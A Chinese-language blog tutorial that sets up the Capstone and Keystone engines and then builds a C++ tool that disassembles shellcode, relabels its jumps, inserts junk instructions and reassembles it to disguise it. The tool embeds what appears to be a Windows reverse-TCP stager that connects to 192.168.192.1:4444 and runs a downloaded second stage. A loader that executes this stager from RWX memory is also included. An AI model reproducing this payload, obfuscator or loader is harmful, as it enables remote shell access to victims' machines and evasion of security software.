0.简介
汇编和反汇编的过程,就是硬编码(二进制机器码)和汇编指令之间的相互转化。最直白的方式,就是直接查Intel的白皮书,具体转换方法可以参考《二进制入门学习笔记-14.windows硬编码》。自己翻手册实现这个过程显然很繁琐,不过好在已经有Keystone和Capstone两大神器实现了这一需求。
- Capstone:目前最优秀的开源反汇编引擎之一,radare2等众多逆向分析工具都使用该反汇编引擎(IDA使用的是其自带的反汇编引擎)。可以快速将硬编码转换为汇编语句。详情见Capstone官网
- Keystone:开源的轻量级多平台、多架构汇编框架,可以实现从汇编语句转换为硬编码。详情见Keystone官网
1.开发环境配置
所用开发环境(IDE)为Microsoft Visual Studio 2019,操作系统为Windows 10 x64。
1.1 Capstone开发环境
Capstone安装非常简单,Github仓库中选取所需要release版本即可,这里我下载的是64位版本的。解压完成后即可看到如下文件:
这里的lib文件和dll文件可以直接在我目前的开发环境下使用。include文件夹下的capstone文件夹中,还有开发时所需要的头文件。我这里使用静态链接库进行开发,开发时只需将capstone.lib及include/capstone文件夹拖入项目并导入即可。
1.2 Keystone开发环境
Keystone官方提供的版本编译环境较为老旧,无法在当前环境下使用。需要自己重新编译,下载源码包并解压。这里我想要编译x64的lib,因此使用x64 Native Tools Command Prompt for VS 2019
进行编译。
编译方法如下:
cd C:\Users\crls\Desktop\keystone-0.9.1
mkdir build
cd build
..\nmake-lib.bat
编译完成后会在build\llvm\lib目录下生成keystone.lib文件。
使用时,将该keystone.lib文件和include目录下的keystone目录均复制到项目文件夹并导入即可。
1.3 测试开发环境
新建一个空项目,并导入所需的lib库和头文件。 主文件中写入如下代码:
#include <iostream> #include <stdio.h> #include <cinttypes> #include "capstone/capstone.h" #include "keystone/keystone.h" using namespace std; #define CODE1 "\x41\x4a\xb8\x78\x56\x34\x12" #define CODE2 "INC ecx; DEC edx;mov eax,0x12345678" void testCapstone(void) { csh handle; cs_insn* insn; size_t count; if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle)) { printf("ERROR: Failed to initialize engine!\n"); } count = cs_disasm(handle, (unsigned char*)CODE1, sizeof(CODE1) - 1, 0x1000, 0, &insn); if (count) { size_t j; for (j = 0; j < count; j++) { printf("0x%""Ix"":\t%s\t\t%s\n", insn[j].address, insn[j].mnemonic, insn[j].op_str); } cs_free(insn, count); } else printf("ERROR: Failed to disassemble given code!\n"); cs_close(&handle); } void testKeystone(void) { ks_engine* ks; ks_err err; size_t count; unsigned char* encode; size_t size; err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks); if (err != KS_ERR_OK) { printf("ERROR: failed on ks_open(), quit\n"); } if (ks_asm(ks, CODE2, 0, &encode, &size, &count) != KS_ERR_OK) { printf("ERROR: ks_asm() failed & count = %lu, error = %u\n", count, ks_errno(ks)); } else { size_t i; printf("%s = ", CODE2); for (i = 0; i < size; i++) { printf("%02x ", encode[i]); } printf("\n"); printf("Compiled: %lu bytes, statements: %lu\n", size, count); } // NOTE: free encode after usage to avoid leaking memory ks_free(encode); // close Keystone instance when done ks_close(ks); } int main(int argc, char** argv) { printf("------------Capstone测试结果------------\n"); testCapstone(); printf("------------Capstone测试结果------------\n"); printf("\n\n"); printf("------------Keystone测试结果------------\n"); testKeystone(); printf("------------Keystone测试结果------------\n"); }
运行结果如下:
2.实现代码
以下代码参考了别人Python版本的思路。先把shellcode转换成字符串形式的汇编指令。然后遍历每一条汇编指令,给每一个跳转点都起上名字,通过这个名字进行跳转。然后添加花指令,再使用keystone将字符串形式的汇编指令转换成shellcode。
#include <iostream> #include <stdio.h> #include <cinttypes> #include "capstone/capstone.h" #include "keystone/keystone.h" #include <string.h> using namespace std; string getOpCodeFromAssemblyCode(string assemblyCode) { string res; ks_engine* ks; ks_err err; size_t count; unsigned char* encode; size_t size; err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks); if (err != KS_ERR_OK) { printf("ERROR: failed on ks_open(), quit\n"); } if (ks_asm(ks, assemblyCode.data(), 0, &encode, &size, &count) != KS_ERR_OK) { printf("ERROR: ks_asm() failed & count = %lu, error = %u\n", count, ks_errno(ks)); } else { size_t i; for (i = 0; i < size; i++) { char szTmp[3]; sprintf_s(szTmp, "%02x", encode[i]); res += "\\x"; res += szTmp; //printf("\\x%02x", encode[i]); } //printf("\n"); //printf("Compiled: %lu bytes, statements: %lu\n", size, count); ks_free(encode); ks_close(ks); return res; } } int offSetToIndex(int offset, int assemblyCodeLength, int opCodeLenArray[]) { int index = 0; //printf("assemblyCodeLength:%d\n",assemblyCodeLength); for (int i = 0; i < assemblyCodeLength;i++) { //cout << i << " : offset: " << offset << "insn[i].size: "<< opCodeLenArray[i]<<endl; offset = offset - opCodeLenArray[i]; index += 1; if (offset == 0) { return index; } } } void addThunkCode(char CODE1[], int codeLen, string tunkCode) { string controlflow[] = { "jmp", "jz", "jnz", "je", "jne", "call", "jl", "ja", "loop", "jecxz", "jle", "jge", "jg", "jp", "jnl" }; string registers[] = { "eax", "ecx","edx", "ebx", "esp", "ebp", "esi", "edi" }; string assemblyCodeArray[4000];//存储汇编代码 int opCodeLenArray[4000];//存储每条汇编指令opcode的长度 int assemblyCodeWithControlflow[4000];//存储包含控制流的汇编代码编号 int numOfAssemblyCodeWithControlflow = 0; int numOfassemblyCodeToJumpTo = 0; int assemblyCodeToJumpTo[4000]; size_t assemblyCodeLength=0; /*---获取反汇编结果数组assemblyCodeArray---*/ csh handle; cs_insn* insn; if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle)) { printf("ERROR: Failed to initialize engine!\n"); } cs_option(handle, CS_OPT_SKIPDATA, 
CS_OPT_ON);//跳过数据 assemblyCodeLength = cs_disasm(handle, (unsigned char*)CODE1, codeLen - 1, 0x0, 0, &insn); if (assemblyCodeLength) { for (size_t i = 0; i < assemblyCodeLength; i++) { /* printf("0x%""Ix"":\t%s\t\t%s\t", insn[i].address, insn[i].mnemonic, insn[i].op_str); for (int k = 0; k < insn[i].size; k++) { printf("/x%x", insn[i].bytes[k]); } printf("\n"); */ opCodeLenArray[i] = insn[i].size; assemblyCodeArray[i] = insn[i].mnemonic; assemblyCodeArray[i] += " "; if (strlen(insn[i].op_str)==1) {//防止奇葩情况,如果是一位数没有0x assemblyCodeArray[i] += "0x"; } assemblyCodeArray[i] += insn[i].op_str; } printf("------1.反汇编结果------\n"); for (size_t i = 0; i < assemblyCodeLength; i++) { printf("%d: %s\n", i, assemblyCodeArray[i].data()); } printf("------1.反汇编结果------\n\n\n"); } else { printf("ERROR: Failed to disassemble given code!\n"); } /*获取反汇编结果数组assemblyCodeArray*/ printf("-------查找跳转指令-------\n"); /*获取所有包含跳转但操作数不是寄存器的汇编代码编号*/ for (int i = 0; i < assemblyCodeLength; i++) { bool hasControlflow = false;//保存汇编代码中是否包含跳转代码 bool hasRegisters = false;//保存汇编代码中是否包含寄存器 for (int j = 0; j < (sizeof(controlflow)/sizeof(controlflow[0])); j++) { if (assemblyCodeArray[i].find(controlflow[j])!=-1) { hasControlflow = true; string tmpOpst=insn[i].op_str; for (int k = 0; k < (sizeof(registers) / sizeof(registers[0])); k++) { if (tmpOpst.find(registers[k]) != -1) { hasRegisters = true; } } } } if ((hasControlflow == true) && (hasRegisters == false)) { assemblyCodeWithControlflow[numOfAssemblyCodeWithControlflow] = i; printf("发现第%d行汇编代码中包含跳转指令,汇编代码为:%s\n", assemblyCodeWithControlflow[numOfAssemblyCodeWithControlflow], assemblyCodeArray[i]); numOfAssemblyCodeWithControlflow++; } } printf("-------查找跳转指令-------\n\n"); /*获取所有包含跳转但操作数不是寄存器的汇编代码编号*/ /*给所有被跳转到的位置加上一个名字,并使用名字完成跳转*/ printf("-------对跳转到的位置标签化-------\n"); for (int i = 0; i < numOfAssemblyCodeWithControlflow; i++) { int pos = -1; //0x的位置 int offSet = -1;//原始的偏移 int index = -1; //跳转对应汇编代价的序号 string tmpAssemblyCode; tmpAssemblyCode = 
assemblyCodeArray[assemblyCodeWithControlflow[i]]; pos = tmpAssemblyCode.find("0x"); offSet = atof(tmpAssemblyCode.substr(pos,tmpAssemblyCode.length()).c_str()); index = offSetToIndex(offSet, assemblyCodeLength, opCodeLenArray); char strIndex[1000];//存储字符串形式的index _itoa_s(index, strIndex, 10); //将跳转位置替换成标签 tmpAssemblyCode = assemblyCodeArray[assemblyCodeWithControlflow[i]].substr(0,pos); tmpAssemblyCode += "jus4fun"; tmpAssemblyCode += strIndex; assemblyCodeArray[assemblyCodeWithControlflow[i]] = tmpAssemblyCode; //判断跳转到的位置是否已经添加标签 bool isAddName = false; for (int j = 0; j < numOfassemblyCodeToJumpTo; j++) { if (assemblyCodeToJumpTo[j] == index) { isAddName = true; } } if (!isAddName) { assemblyCodeToJumpTo[numOfassemblyCodeToJumpTo] = index; string tmpAssemblyCode = "jus4fun"; tmpAssemblyCode += strIndex; tmpAssemblyCode += ": "; tmpAssemblyCode += assemblyCodeArray[index]; assemblyCodeArray[index] = tmpAssemblyCode; printf("对第%d行跳转到的代码进行标签化中,标签化结果为%s\n", index, tmpAssemblyCode.c_str()); numOfassemblyCodeToJumpTo++; } //printf("第%d行的跳转进行标签中,跳转对应代码位置为:%d\n", assemblyCodeWithControlflow[i], index); } printf("已对%d行代码完成标签化\n", numOfassemblyCodeToJumpTo); printf("-------对跳转到的位置标签化-------\n"); /*给所有被跳转到的位置加上一个名字*/ /*添加花指令*/ string assemblyCodeRes; for (size_t i = 0; i < assemblyCodeLength; i++) { assemblyCodeRes += assemblyCodeArray[i]; assemblyCodeRes += ";"; assemblyCodeRes += tunkCode; printf("%d: %s\n", i, assemblyCodeArray[i].data()); } printf("\n\n------添加花指令后的代码汇编代码如下------\n"); printf("%s",assemblyCodeRes.data()); /*添加花指令*/ /*输出加花后的硬编码*/ printf("\n\n------添加花指令后的硬编码如下------\n"); cout << getOpCodeFromAssemblyCode(assemblyCodeRes) << endl; /*输出加花后的硬编码*/ /*释放打开的句柄*/ cs_free(insn, assemblyCodeLength); cs_close(&handle); /*释放打开的句柄*/ } int main(int argc, char** argv) { char CODE1[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc0\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int codeLen = sizeof(CODE1); string tunkCode = "NOP;"; addThunkCode(CODE1, codeLen, tunkCode); }
使用如下代码对加花前和加花后代码做简单的加载器进行测试:
#include <stdio.h> #include <stdlib.h> #include <windows.h> int main() { char str[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc0\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; void* exec = VirtualAlloc(0,sizeof(str),MEM_COMMIT,PAGE_EXECUTE_READWRITE); memcpy(exec,str,sizeof(str)); ((void(*)())exec)(); }
结果如下: